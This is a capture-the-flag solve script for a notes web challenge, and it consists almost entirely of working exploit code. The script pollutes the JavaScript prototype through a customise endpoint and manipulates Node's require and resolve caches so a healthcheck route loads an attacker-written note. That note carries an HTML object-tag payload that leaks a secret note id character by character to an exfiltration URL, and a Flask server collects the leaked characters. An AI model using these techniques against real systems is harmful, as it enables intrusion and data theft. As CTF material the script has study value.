Required notes solve script

exploit.py

import requests
from flask import Flask
import string
import time
from threading import Thread


charset=string.digits+string.ascii_lowercase
url="<instance_url>"
proxies={"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
useless={"title":"useless","content":"just useless"}

app = Flask(__name__)

def gen_payload(fchar):
    payload=""
    for i in charset:
        i=fchar+i
        payload=payload+f"<object data='http://127.0.0.1:3000/search/{i}'><object data='<exfil_url>/found/{i}'></object></object>"
    return payload

# Reset settings.proto to clean
def reset_settings():
	options={"data":[{"title":"optional"},{"author":"optional"}]}
	r=requests.post(url+"customise", json=options, proxies=proxies, verify=False)
	print(r.text)


# Write payload note:
def write_expl(expl):
	reset_settings()
	payload={"title":"asdf","content":expl}
	r=requests.post(url+"create", json=payload, proxies=proxies, verify=False)
	print("Message From write_expl",r.json()["Message"])
	payload_id=r.json()["Noteid"]
	return payload_id


def polluter(x,y):
	options={"data":[{"title":"option(a).constructor.prototype.data={};optional"},{"author":"optional"}]}
	requests.post(url+"customise", json=options, proxies=proxies, verify=False)
	requests.post(url+"create", json=useless, proxies=proxies, verify=False)
	options={} # For data.pop()
	requests.post(url+"customise", json=options, proxies=proxies, verify=False)
	#change name to healthcheck note id
	options={"data":[{"title":"option(a).constructor.prototype.data.name=\"./notes/"+x+"\";optional"},{"author":"optional"}]}
	requests.post(url+"customise", json=options, proxies=proxies, verify=False)
	requests.post(url+"create", json=useless, proxies=proxies, verify=False)
	#change name to exploit note id
	options={"data":[{"title":"option(a).constructor.prototype.data.exports=\"./notes/"+y+".json\";optional"},{"author":"optional"}]}
	requests.post(url+"customise", json=options, proxies=proxies, verify=False)
	requests.post(url+"create", json=useless, proxies=proxies, verify=False)


def one_step(note):
	requests.get(url+"delete") # clear cache
	note_id=write_expl(note)
	polluter("Healthcheck",note_id)
	requests.get(url+"view/Healthcheck", verify=False) # get Healthcheck->note_id into resolve cache & deletes require cache and pathcache
	
	polluter("777",note_id)
	requests.get(url+"view/777", verify=False) # get note_id into require cache so Healthcheck->note_id becomes alive again
	requests.get(url+"view/"+note_id+"?temp", verify=False) # delete exploit note from file system
	r=requests.get(url+"healthcheck", verify=False) # Healthcheck -> note_id still works cuz of relativeResolveCache entry
	print(r.text)
	

# Starting off
#path has to be set only once

requests.packages.urllib3.disable_warnings()
options={"data":[{"title":"option(a).constructor.prototype.path=\"./\";optional"},{"author":"optional"}]}
requests.post(url+"customise", json=options, proxies=proxies, verify=False)
requests.post(url+"create", json=useless, proxies=proxies, verify=False)


def attack(found):
	payload=gen_payload(found)
	one_step(payload)


@app.route('/')
def hello():
	attack("")
	return 'Hello, attacker!'

@app.route('/found/<note>')
def found(note):
	print("Found: ",note)
	try:
		thread=Thread(target=attack,args=(note,))
		thread.start()
	except Exception as e:
		print(e)
	return f'You found: {note}'

# Gives 15 characters of flag note id. Bruteforce last character.
if __name__ == '__main__':
    app.run(host='0.0.0.0')